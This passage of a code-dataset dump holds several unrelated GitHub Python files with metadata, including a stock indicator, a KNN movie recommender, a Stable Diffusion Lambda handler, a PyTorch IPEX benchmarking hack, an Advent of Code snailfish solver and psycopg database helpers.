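                      if (p.period_from is None or p.period_from <= unit)
                      and (p.period_to is None or p.period_to >= unit)), None)
        if match is None:
            match = default                      # uncovered unit -> per-unit default
        if match is not None:
            if not match.for_unit and id(match) in charged:
                continue                         # a range tier is charged only once
            charged.add(id(match))
            total += match.price
    return total

# total_price([TierPrice(100, 1, 3), TierPrice(10, for_unit=True)], 5) == 120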
SupplyOnDemand(IndicatorClassInterface, ABC):\n\n def __init__(self):\n self.__analysis_outcome = None\n self.__stock_data = None\n self.__supply_on_demand = []\n\n def set_stock_data(self, stock_data: StockData.StockDataHolder.StockDataHolder):\n self.__stock_data = stock_data\n\n def set_required_analysis_outcome(self, analysis_outcome):\n self.__analysis_outcome = analysis_outcome\n\n def calculate_indicator(self):\n\n data = self.__stock_data.raw_data\n close = data['Close']\n open = data['Open']\n high = data['High']\n low = data['Low']\n volume = data['Volume']\n\n all_volume = sum(volume)\n\n supply_on_demand = [all_volume]\n\n \"\"\"Cel - obliczenie ile zostało potencjalnych nabywców\"\"\"\n for date in self.__stock_data.get_dates_arrays_dict(date_format=\"iso_string\")['daily']:\n if close[date] > open[date]:\n supply_on_demand.append(volume[date] - supply_on_demand[-1])\n else:\n supply_on_demand.append(volume[date] + supply_on_demand[-1])\n\n self.__supply_on_demand = supply_on_demand\n\n def plot(self):\n plt.plot(self.__supply_on_demand)\n plt.show()\n", "repo_name": "LozynskiW/BigShortPy", "sub_path": "IndicatorsCalculation/SupplyDemandBased.py", "file_name": "SupplyDemandBased.py", "file_ext": "py", "file_size_in_byte": 1412, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "IndicatorsCalculation.IndicatorsClassInterface.IndicatorClassInterface", "line_number": 8, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 8, "usage_type": "name"}, {"api_name": "StockData.StockDataHolder.StockDataHolder", "line_number": 15, "usage_type": "attribute"}, {"api_name": "StockData.StockDataHolder", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "7381008898", "text": "#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nfrom scipy.sparse import csr_matrix\nfrom sklearn.neighbors import NearestNeighbors\nfrom fuzzywuzzy import process\n\nuser_url=r\"https://drive.google.com/file/d/155oakHcdg3UWi9I-mKI4FWNGZM0G1knS/view?usp=share_link\"\nmov_url=r\"https://drive.google.com/file/d/1jFVDbi43OkinguO6URYlRf41nTbhRx6W/view?usp=share_link\"\n\nmovcol=['movieId','title']\ndf_movies = pd.read_csv(mov_url,names=movcol,sep='|',encoding='latin-1', usecols=['movieId', 'title'],\n dtype={'movieId': 'int32', 'title': 'str'})\ndf_movies.head()\n\nusercol=['userId','movieId','rating']\ndf_ratings = pd.read_csv(user_url,names=usercol,sep='\\t',encoding='latin-1', usecols=['userId', 'movieId', 'rating'],\n dtype={'userId': 'int32', 'movieId': 'int32', 'rating': 'float32'})\ndf_ratings.head\n\nmovies_users=df_ratings.pivot(index='movieId', columns='userId',values='rating').fillna(0)\nmat_movies_users=csr_matrix(movies_users.values)\nmodel_knn= NearestNeighbors(metric='cosine', algorithm='brute', n_neighbors=20)\n\nmodel_knn.fit(mat_movies_users)\n\ndef recommender(movie_name, data, model, n_recommendations ):\n model.fit(data)\n idx=process.extractOne(movie_name, df_movies['title'])[2]\n print('Movie Selected: ',df_movies['title'][idx], 'Index: ',idx)\n print('Searching for recommendations.....')\n distances, indices=model.kneighbors(data[idx], n_neighbors=n_recommendations)\n for i in 
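The SupplyDemandBased.py record carries its recurrence through a class with private attributes; a pure-function restatement, assuming an OHLCV pandas DataFrame, makes the arithmetic easier to unit-test. The seed value is the total traded volume, and each day's volume is subtracted from or added to the running value depending on whether the candle closed up or down.

import pandas as pd

def supply_on_demand(df: pd.DataFrame) -> pd.Series:
    """Same recurrence as SupplyOnDemand.calculate_indicator, minus the plumbing."""
    values = [df["Volume"].sum()]        # seed: total volume over the whole frame
    for _, row in df.iterrows():
        if row["Close"] > row["Open"]:   # up day: subtract the running value
            values.append(row["Volume"] - values[-1])
        else:                            # down or flat day: add it
            values.append(row["Volume"] + values[-1])
    return pd.Series(values[1:], index=df.index)

Incidentally, the original calculate_indicator binds high and low without using them and shadows the open builtin; the restatement drops both.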
indices:\n print(df_movies['title'][i].where(i!=idx))\n \nrecommender('Vertigo', mat_movies_users, model_knn,20)\n\n", "repo_name": "Sapphirine/202212-16-Movie-Recommendation-System-With-Chatbot", "sub_path": "Method/KNN.py", "file_name": "KNN.py", "file_ext": "py", "file_size_in_byte": 1558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.neighbors.NearestNeighbors", "line_number": 24, "usage_type": "call"}, {"api_name": "fuzzywuzzy.process.extractOne", "line_number": 30, "usage_type": "call"}, {"api_name": "fuzzywuzzy.process", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "33094934009", "text": "import properties\n\nclass SabSpeedWebController(object):\n\n def __init__(self, sabSpeedController):\n self.sabSpeedController = sabSpeedController\n \n def index(self):\n return self.getWebHtmlContent();\n index.exposed = True\n \n def setSabSpeed(self, newSpeed=None, minutesToHaveNewSpeed=None):\n print('Speed override received from web UI:')\n print('newSpeed: ' + newSpeed)\n print('minutesToHaveNewSpeed: ' + minutesToHaveNewSpeed)\n self.sabSpeedController.createSabSpeedOverride(newSpeed, minutesToHaveNewSpeed)\n return 'Your speed override has been set (Player!)'\n setSabSpeed.exposed = True\n \n def getWebHtmlContent(self):\n webHtmlContentResult = 'There was a problem getting page html from file :('\n with open(properties.SabSpeedControllerHtmlFile, 'r') as file:\n readData = file.read()\n webHtmlContentResult = readData;\n return webHtmlContentResult\n \n \n \n \n", "repo_name": "peenuty/Sabnzbd-SpeedDistributionCapping", "sub_path": "Sabnzbd-SpeedDistributionCapping/src/SabSpeedControllerWeb.py", "file_name": "SabSpeedControllerWeb.py", "file_ext": "py", "file_size_in_byte": 999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "properties.SabSpeedControllerHtmlFile", "line_number": 22, "usage_type": "attribute"}]} +{"seq_id": "17693158959", "text": "import gc\nimport json\nimport requests\nfrom typing import TypedDict, Optional\nimport tempfile\nimport boto3\nimport cv2\nimport numpy as np\nfrom stable_diffusion_engine import StableDiffusionEngine\nfrom diffusers import LMSDiscreteScheduler, PNDMScheduler # scheduler\n\nDEFAULT_MODEL = \"ShadowPower/waifu-diffusion.openvino\" # model name\nDEFAULT_TOKENIZER = \"openai/clip-vit-large-patch14\" # tokenizer\nDEFAULT_SEED = None # random seed for generating consistent images per prompt\nDEFAULT_BETA_START = 0.00085 # LMSDiscreteScheduler::beta_start\nDEFAULT_BETA_END = 0.012 # LMSDiscreteScheduler::beta_end\nDEFAULT_BETA_SCHEDULE = \"scaled_linear\" # LMSDiscreteScheduler::beta_schedule\nDEFAULT_NUM_INFERENCE_STEPS = 32 # num inference steps\nDEFAULT_GUIDANCE_SCALE = 7.5 # guidance scale\nDEFAULT_ETA = 0.0 # eta\nDEFAULT_PROMPT = \"Street-art painting of Sakura with tower in style of Banksy\" # prompt\nDEFAULT_NEGATIVE_PROMPT = \"\" # negative_prompt\nDEFAULT_INIT_IMAGE = None # path to initial image\nDEFAULT_STRENGTH = 0.5 # how strong the initial image should be noised [0.0, 1.0]\nDEFAULT_MASK = None # mask of the region to inpaint on the initial image\n\nclass Event(TypedDict):\n prompt: Optional[str]\n negative_prompt: 
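KNN.py above builds its item-user matrix from the MovieLens files on Google Drive; a toy, self-contained version of the same NearestNeighbors pipeline (made-up ratings, three movies by four users) shows the expected input shape and why the first returned neighbor is always the query row itself: its cosine distance is zero.

import numpy as np
from scipy.sparse import csr_matrix
from sklearn.neighbors import NearestNeighbors

# Rows are movies, columns are users, values are ratings (0 = unrated).
ratings = csr_matrix(np.array([
    [5, 0, 3, 0],
    [4, 0, 3, 1],
    [0, 5, 0, 4],
], dtype=np.float32))

model = NearestNeighbors(metric="cosine", algorithm="brute")
model.fit(ratings)

distances, indices = model.kneighbors(ratings[0], n_neighbors=3)
print(indices[0])    # [0 1 2]: the query movie first, then its nearest neighbor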
Optional[str]\n num_inference_steps: Optional[int]\n init_image: Optional[str]\n mask: Optional[str]\n guidance_scale: Optional[float]\n seed: Optional[int]\n output: Optional[str]\n beta_start: Optional[float]\n beta_end: Optional[float]\n beta_schedule: Optional[str]\n eta: Optional[float]\n strength: Optional[float]\n model: Optional[str]\n tokenizer: Optional[str]\n s3_bucket_name: Optional[str]\n s3_object_name: Optional[str]\n\ndef imread_web(url):\n res = requests.get(url)\n img = None\n with tempfile.NamedTemporaryFile(dir='/tmp') as fp:\n fp.write(res.content)\n fp.file.seek(0)\n img = cv2.imread(fp.name)\n return img\n\ndef handler(event: Event, context):\n gc.collect()\n print(event)\n\n prompt = event.setdefault('prompt', DEFAULT_PROMPT)\n num_inference_steps = event.setdefault('num_inference_steps', DEFAULT_NUM_INFERENCE_STEPS)\n guidance_scale = event.setdefault('guidance_scale', DEFAULT_GUIDANCE_SCALE)\n seed = event.setdefault('seed', DEFAULT_SEED)\n if seed is None:\n import random\n seed = random.randint(0,4294967295)\n np.random.seed(seed)\n model = event.setdefault('model', DEFAULT_MODEL)\n\n if event.setdefault('init_image', DEFAULT_INIT_IMAGE) is None:\n scheduler = LMSDiscreteScheduler(\n beta_start=event.setdefault('beta_start', DEFAULT_BETA_START),\n beta_end=event.setdefault('beta_end', DEFAULT_BETA_END),\n beta_schedule=event.setdefault('beta_schedule', DEFAULT_BETA_SCHEDULE),\n tensor_format=\"np\"\n )\n else:\n scheduler = PNDMScheduler(\n beta_start=event.setdefault('beta_start', DEFAULT_BETA_START),\n beta_end=event.setdefault('beta_end', DEFAULT_BETA_END),\n beta_schedule=event.setdefault('beta_schedule', DEFAULT_BETA_SCHEDULE),\n skip_prk_steps = True,\n tensor_format=\"np\"\n )\n engine = StableDiffusionEngine(\n scheduler = scheduler,\n model = model,\n tokenizer = event.setdefault('tokenizer', DEFAULT_TOKENIZER),\n )\n image = engine(\n prompt = prompt,\n negative_prompt = event.setdefault('negative_prompt', DEFAULT_NEGATIVE_PROMPT),\n init_image = None if event.setdefault('init_image', DEFAULT_INIT_IMAGE) is None else imread_web(event['init_image']),\n mask = None if event.setdefault('mask', DEFAULT_MASK) is None else cv2.imread(imread_web(event['mask']), 0),\n strength = event.setdefault('strength', DEFAULT_STRENGTH),\n num_inference_steps = num_inference_steps,\n guidance_scale = guidance_scale,\n eta = event.setdefault('eta', DEFAULT_ETA)\n )\n del engine\n\n cv2.imwrite('/tmp/output.png', image)\n if event['s3_object_name'] is not None:\n ExtraArgs={'Metadata':{'json':json.dumps({'prompt':prompt,'seed':seed,'num_inference_steps':num_inference_steps,'guidance_scale':guidance_scale,'model':model})}}\n boto3.client('s3').upload_file('/tmp/output.png', event['s3_bucket_name'], event['s3_object_name'], ExtraArgs=ExtraArgs)\n gc.collect()\n", "repo_name": "from20020516/serverless-diffusion-discord", "sub_path": "lib/lambda/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 4335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypedDict", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 32, "usage_type": "name"}, 
{"api_name": "typing.Optional", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 36, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 44, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 52, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 56, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 66, "usage_type": "attribute"}, {"api_name": "diffusers.LMSDiscreteScheduler", "line_number": 70, "usage_type": "call"}, {"api_name": "diffusers.PNDMScheduler", "line_number": 77, "usage_type": "call"}, {"api_name": "stable_diffusion_engine.StableDiffusionEngine", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 93, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 101, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 103, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 104, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "74532274404", "text": "import torch\nimport intel_extension_for_pytorch as ipex\nfrom typing import Callable\nimport functools\nimport inspect\n\n# _orig_module_function: Callable = getattr(cls, attr_name)\n# print(\"--------------{}\".format(hasattr(torch.nn.Module, \"__new__\")))\n# print(getattr(torch.nn.Module, \"__new__\"))\n# print(getattr(object, \"__new__\"))\n# exit(-1)\n\norigin_new = getattr(torch.nn.Module, \"__new__\")\n\ndef wrap_new(cls, *args, **kwargs):\n print(\"----inside the new __new__----\")\n obj = object.__new__(cls)\n print(\"obj.__class__ is:{}\".format(obj.__class__), flush=True)\n isOutSideModel = True\n for frameinfo in inspect.stack():\n print(frameinfo.function)\n if frameinfo.function == \"__init__\":\n isOutSideModel = False\n\n insideIPEXOptimize = False\n for frameinfo in inspect.stack():\n print(frameinfo.function)\n if frameinfo.function == \"optimize\":\n insideIPEXOptimize = True\n\n if isOutSideModel and not insideIPEXOptimize:\n origin_class_init = getattr(obj.__class__, \"__init__\")\n def new_init_class(mod, *args, **kwargs):\n print(\"----inside the new new_init_class----\")\n origin_class_init(mod, *args, **kwargs)\n mod = mod.eval()\n # **TODO** Here has problem: mod can't be replaced here\n mod = ipex.optimize(mod, dtype=torch.float32).eval()\n # Possible solution1: https://stackoverflow.com/questions/7940470/is-it-possible-to-overwrite-self-to-point-to-another-object-inside-self-method\n # optimized_self = ipex.optimize(self.eval(), 
dtype=torch.float32).eval()\n # self.__class__ = optimized_self.__class__\n # self.__dict__ = optimized_self.__dict__\n # It works, but model after ipex.optimize can't to channel_last: model = ipex.optimize(model.eval()).to(memory_format=torch.channels_last).eval()\n # Possible solution2: substitue the call, forward method of mod here\n print(hash(mod))\n print(\"----finish the init of outside module----\", flush=True)\n setattr(obj.__class__, \"__init__\", new_init_class)\n return obj\n\nsetattr(torch.nn.Module, \"__new__\", wrap_new)\n\nimport torch\nimport torch.fx.experimental.optimization as optimization\nimport torchvision.models as models\nimport time\nimport argparse\n\n\"\"\"\nexport LD_PRELOAD=\"/pytorch/leslie/jemalloc/lib/libjemalloc.so\":$LD_PRELOAD\nexport MALLOC_CONF=\"oversize_threshold:1,background_thread:true,metadata_thp:auto,dirty_decay_ms:9000000000,muzzy_decay_ms:9000000000\"\nexport LD_PRELOAD=$LD_PRELOAD:/pytorch/leslie/anaconda3/pkgs/intel-openmp-2021.4.0-h06a4308_3561/lib/libiomp5.so\nKMP_BLOCKTIME=1 KMP_AFFINITY=granularity=fine,compact,1,0 OMP_NUM_THREADS=56 numactl -C 0-55 -m 0 python baseline.py --datatype int8\n\"\"\"\nparser = argparse.ArgumentParser(description='AI everywhere experiments')\nparser.add_argument('--datatype', default='int8', help='path to dataset')\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n if args.datatype == \"bf16\":\n CodeFreeAutocastEnabled = True\n\n iteration = 100\n batch_size = 56\n\n print(\"datatype is:{}\".format(args.datatype))\n print(\"batch_size is:{}\".format(batch_size))\n\n model = models.__dict__[\"resnet50\"](pretrained=True)\n if args.datatype == \"fp32\" or args.datatype == \"bf16\":\n model = model.to(memory_format=torch.channels_last).eval()\n\n x = torch.randn(batch_size, 3, 224, 224).contiguous(memory_format=torch.channels_last)\n\n if args.datatype == \"fp32\":\n # model = ipex.optimize(model, dtype=torch.float32)\n pass\n elif args.datatype == \"bf16\":\n # model = ipex.optimize(model, dtype=torch.bfloat16)\n pass\n else:\n print(\"unsupported data type\", flush=True)\n exit(-1)\n\n with torch.no_grad():\n # warm up\n for i in range(3):\n # print(\"----warm up step: {}\".format(i))\n model(x)\n\n print(\"hash(model) is:{}\".format(hash(model)))\n start = time.time()\n for i in range(iteration):\n # print(\"----step: {}\".format(i))\n if i == 29:\n with torch.profiler.profile(on_trace_ready=torch.profiler.tensorboard_trace_handler(\"./profile_log\")) as prof:\n model(x)\n print(prof.key_averages().table(sort_by=\"self_cpu_time_total\"))\n else:\n model(x)\n # model(x)\n end = time.time()\n print(\"time for one iteration is:{} ms\".format((end-start)/iteration*1000))\n", "repo_name": "leslie-fang-intel/torch_script", "sub_path": "code_free/test_class.py", "file_name": "test_class.py", "file_ext": "py", "file_size_in_byte": 4526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn", "line_number": 13, "usage_type": "attribute"}, {"api_name": "inspect.stack", "line_number": 20, "usage_type": "call"}, {"api_name": "inspect.stack", "line_number": 26, "usage_type": "call"}, {"api_name": "intel_extension_for_pytorch.optimize", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 64, "usage_type": "call"}, {"api_name": 
"torchvision.models.__dict__", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torchvision.models", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.channels_last", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.channels_last", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 95, "usage_type": "call"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.profiler.profile", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.profiler", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.profiler.tensorboard_trace_handler", "line_number": 106, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "27096653831", "text": "import ast\nfrom math import floor, ceil\nfrom collections import defaultdict, OrderedDict\nfrom itertools import permutations\nfrom copy import deepcopy\n\n\ndef part_one(sf_list):\n\n sf_number = sf_list[0]\n\n for i in range(1, len(sf_list)):\n sf_number = [sf_number, sf_list[i]]\n sf_number = compute_number(sf_number)\n\n while recursive_len(sf_number) > 2:\n sf_number = magnitude(sf_number)\n\n sf_magnitude = sf_number[0] * 3 + sf_number[1] * 2\n return sf_magnitude\n\n\ndef part_two(fs_pt2):\n mag_list = []\n perm_tup = permutations(fs_pt2, 2)\n perm_lst = []\n for line in list(perm_tup):\n perm_lst.append(deepcopy(list(line)))\n\n for x, line in enumerate(perm_lst.copy()):\n c_fish = deepcopy(line)\n c_fish = compute_number(c_fish)\n mag_fish = deepcopy(c_fish)\n\n while recursive_len(mag_fish) > 2:\n mag_fish = magnitude(mag_fish)\n\n sf_magnitude = mag_fish[0] * 3 + mag_fish[1] * 2\n mag_list.append(sf_magnitude)\n return max(mag_list)\n\n\ndef magnitude(fish: list) -> list:\n fish_dict = create_dict_from_list(fish, '', 'list', 'None')\n fish_dict = OrderedDict(sorted(fish_dict.items()))\n for key, value in list(fish_dict.items()):\n elem_size = recursive_len(value[0])\n\n key_size = len(key)\n if elem_size == 2:\n\n if key_size != 1:\n elem_side = int(key[-1])\n element_mag = (value[0][0]) * 3 + (value[0][1] * 2)\n fish_dict[key] = [element_mag, 'int', 'None']\n fish_dict[key[:-1]][0][elem_side] = element_mag\n fish_dict.pop(key)\n else:\n element_mag = (value[0][0]) * 3 + (value[0][1] * 2)\n fish_dict[key] = [element_mag, 'int', 'None']\n\n if isinstance(value[0], int) and key_size != 1:\n fish_dict.pop(key)\n\n return create_list_from_dict(fish_dict)\n\n\ndef recursive_len(item):\n if type(item) == list:\n return sum(recursive_len(subitem) for subitem in item)\n else:\n return 1\n\n\ndef compute_number(sf_number: list):\n\n fish_number = sf_number.copy()\n fish_dict = create_dict_from_list(sf_number, '', 'list', 'None')\n fish_dict = OrderedDict(sorted(fish_dict.items()))\n\n if any([True for k, v in fish_dict.items() if v[2] == 'Explode']):\n fish_dict = explode_dict(fish_dict)\n fish_number = [fish_dict['0'][0], fish_dict['1'][0]]\n compute_number(fish_number)\n elif any([True for k, v in fish_dict.items() if v[2] == 'Split']):\n fish_dict = split_dict(fish_dict)\n fish_number = [fish_dict['0'][0], fish_dict['1'][0]]\n compute_number(fish_number)\n\n return fish_number\n\n\ndef create_dict_from_list(snailfish: list[list], sig: str, t: str, operation: str) -> dict:\n ret = defaultdict(list)\n create_dict(snailfish, sig, t, operation, ret)\n return ret\n\n\ndef create_list_from_dict(sf_dict: 
dict) -> list:\n return [sf_dict['0'][0], sf_dict['1'][0]]\n\n\ndef create_dict(seq: list, sig: str, t: str, operation: str, m: dict):\n left = seq[0]\n left_sig = sig + '0'\n right = seq[1]\n right_sig = sig + '1'\n m[left_sig] = [left, t, operation]\n m[right_sig] = [right, t, operation]\n\n if len(left_sig) > 3 and isinstance(left, list):\n operation = 'Explode'\n m[left_sig][2] = operation\n if len(right_sig) > 3 and isinstance(right, list):\n operation = 'Explode'\n m[right_sig][2] = operation\n if isinstance(left, list):\n create_dict(left, left_sig, 'list', operation, m)\n\n else:\n t = 'int'\n m[left_sig][1] = t\n if m[left_sig][0] > 9:\n m[left_sig][2] = \"Split\"\n if isinstance(right, list):\n create_dict(right, right_sig, 'list', operation, m)\n else:\n t = 'int'\n m[right_sig][1] = t\n if m[right_sig][0] > 9:\n m[right_sig][2] = \"Split\"\n\n\ndef explode_dict(sf_dict: dict) -> dict:\n\n def _zero(k):\n pre_key = ''\n for i in range(len(k)):\n pre_key += k[i]\n list_copy = sf_dict[pre_key][0]\n zero_key = k[len(pre_key):]\n if len(zero_key) == 1:\n list_copy[int(zero_key[0])] = 0\n\n def _sum(k, v):\n pre_key = ''\n for i in range(len(k)):\n pre_key += k[i]\n value_copy = sf_dict[pre_key][0]\n sum_key = k[len(pre_key):]\n\n if len(sum_key) == 1:\n value_copy[int(sum_key[0])] += v\n\n def _find_l_key(k: str):\n test_key = k + '0'\n while True:\n if sf_dict[test_key][1] == 'int':\n return test_key\n else:\n test_key += '1'\n\n def _find_r_key(k: str):\n test_key = k + '1'\n while True:\n if sf_dict[test_key][1] == 'int':\n return test_key\n else:\n test_key += '0'\n\n for key, value in list(sf_dict.items()):\n if value[2] == \"Explode\":\n side = key[-1]\n if side == '1':\n left_check_sig = _find_l_key(key[:-1])\n right_check_sig = _find_r_key(key.rstrip('1')[:-1])\n else:\n left_check_sig = _find_l_key(key.rstrip('0')[:-1])\n right_check_sig = _find_r_key(key[:-1])\n\n if max(key) != \"0\":\n if sf_dict[left_check_sig][1] == 'int':\n _sum(left_check_sig, value[0][0])\n\n if min(key) != \"1\":\n if sf_dict[right_check_sig][1] == 'int':\n _sum(right_check_sig, value[0][1])\n\n sf_dict[key] = [0, 'int', 'None']\n sf_dict.pop(key + '0')\n sf_dict.pop(key + '1')\n\n _zero(key)\n return sf_dict\n\n\ndef split_dict(sf_dict: dict) -> dict:\n def _clean_dict(k, sp_list):\n pre_key = ''\n for i in range(len(k)):\n pre_key += k[i]\n list_copy = sf_dict[pre_key][0]\n clean_key = k[len(pre_key):]\n\n if len(clean_key) == 1:\n list_copy[int(clean_key[0])] = sp_list\n\n for key, value in list(sf_dict.items()):\n if value[2] == \"Split\":\n split_list = [floor(value[0] / 2), ceil(value[0] / 2)]\n sf_dict[key] = [split_list, 'list', 'None']\n if split_list[0] > 9:\n sf_dict[key + '0'] = [split_list[0], 'int', 'Split']\n else:\n sf_dict[key + '0'] = [split_list[0], 'int', 'None']\n if split_list[1] > 9:\n sf_dict[key + '1'] = [split_list[1], 'int', 'Split']\n else:\n sf_dict[key + '1'] = [split_list[1], 'int', 'None']\n _clean_dict(key, split_list)\n return sf_dict # Exit split_dict() after first element is split\n\n\ndef find_sig_key(input_dict: dict, value: str):\n return {k for k, v in input_dict.items() if k == value}\n\n\ndef add_fish(a: list, b: list) -> list:\n comb_fish = [a, b]\n return comb_fish\n\n\ndef read_file():\n with open('input.txt') as f:\n file = f.read().split()\n output = []\n for i, line in enumerate(file):\n output.append(ast.literal_eval(line))\n return output\n\n\nif __name__ == \"__main__\":\n data = read_file()\n print(f'Part One: Magnitude is {part_one(data)}')\n 
print(f'Part Two: Max magnitude is {part_two(data)}')\n", "repo_name": "geoncic/AdventOfCode-2021", "sub_path": "Day 18/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7354, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.permutations", "line_number": 25, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 28, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 31, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 33, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 45, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 79, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 94, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 210, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 210, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 238, "usage_type": "call"}]} +{"seq_id": "19291742395", "text": "import logging\nfrom contextlib import contextmanager\nfrom datetime import datetime, timezone\nfrom typing import (Callable, Concatenate, TypeVar, ParamSpec, Iterable, Type,\n cast, Sequence, Optional, Generator)\n\nfrom psycopg import Cursor, Connection\nfrom psycopg.rows import class_row, BaseRowFactory\nfrom psycopg.types.json import Json\n\nfrom src.channel import BaseChannel\nfrom src.db import models\nfrom src.db.utils import execute_values\nfrom src.enum import Site\nfrom src.video import BaseVideo\n\nlogger = logging.getLogger('debug')\n\nCursorT = TypeVar('CursorT', bound=Cursor)\nConnectionT = TypeVar('ConnectionT', bound=Connection)\nBaseVideoT = TypeVar('BaseVideoT', bound=BaseVideo)\n\n\nP = ParamSpec('P')\nT = TypeVar('T')\n\n\ndef transaction(row_factory: BaseRowFactory[T] = None, real_transaction: bool = False, no_cursor: bool = False):\n def _transaction(f: Callable[Concatenate['WithConnection', P], T]) -> Callable[Concatenate['WithConnection', P], T]:\n def wrapper(self: WithConnection, *args: P.args, **kwargs: P.kwargs) -> T:\n def run_fn() -> T:\n if not no_cursor and 'cur' not in kwargs:\n with self.conn.cursor(row_factory=row_factory) as cur:\n kwargs['cur'] = cur\n return f(self, *args, **kwargs)\n\n return f(self, *args, **kwargs)\n\n if real_transaction:\n with self.conn.transaction():\n return run_fn()\n\n try:\n retval = run_fn()\n self.conn.commit()\n return retval\n except Exception:\n self.conn.rollback()\n raise\n\n return wrapper\n\n return _transaction\n\n\nclass WithConnection:\n def __init__(self, conn: ConnectionT):\n self._conn = conn\n\n @property\n def conn(self) -> ConnectionT:\n return self._conn\n\n @contextmanager\n def class_cursor(self, cls: Type[T]) -> Cursor[T]:\n with self.conn.cursor(row_factory=class_row(cls)) as cur:\n yield cur\n\n\nclass DbUtils(WithConnection):\n @transaction(row_factory=class_row(models.Playlist))\n def add_playlist(self, playlist_id: str, name: str, site: int | Site,\n cur: Cursor[models.Playlist] = NotImplemented) -> models.Playlist:\n \"\"\"\n Adds a playlist to the database if it doesn't exist\n\n Args:\n playlist_id:\n id of the playlist\n name:\n name of the playlist\n site:\n ID of the site being used\n cur:\n Optional cursor\n\n Returns:\n int: The database id of the newly made playlist\n\n \"\"\"\n site = int(site)\n sql = 'INSERT INTO playlists (playlist_id, name, site) VALUES (%s, %s, %s) RETURNING *'\n 
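The Day 18 record above reduces a snailfish number to its magnitude by repeatedly rebuilding a path-keyed dict until two integers remain. The same rule, mag([l, r]) = 3*mag(l) + 2*mag(r) with mag(n) = n for integers, is a three-line recursion over the nested-list form; the 143 check is the example from the Advent of Code 2021 day 18 statement.

def magnitude_recursive(number) -> int:
    # Base case: a bare integer is its own magnitude.
    if isinstance(number, int):
        return number
    left, right = number
    return 3 * magnitude_recursive(left) + 2 * magnitude_recursive(right)

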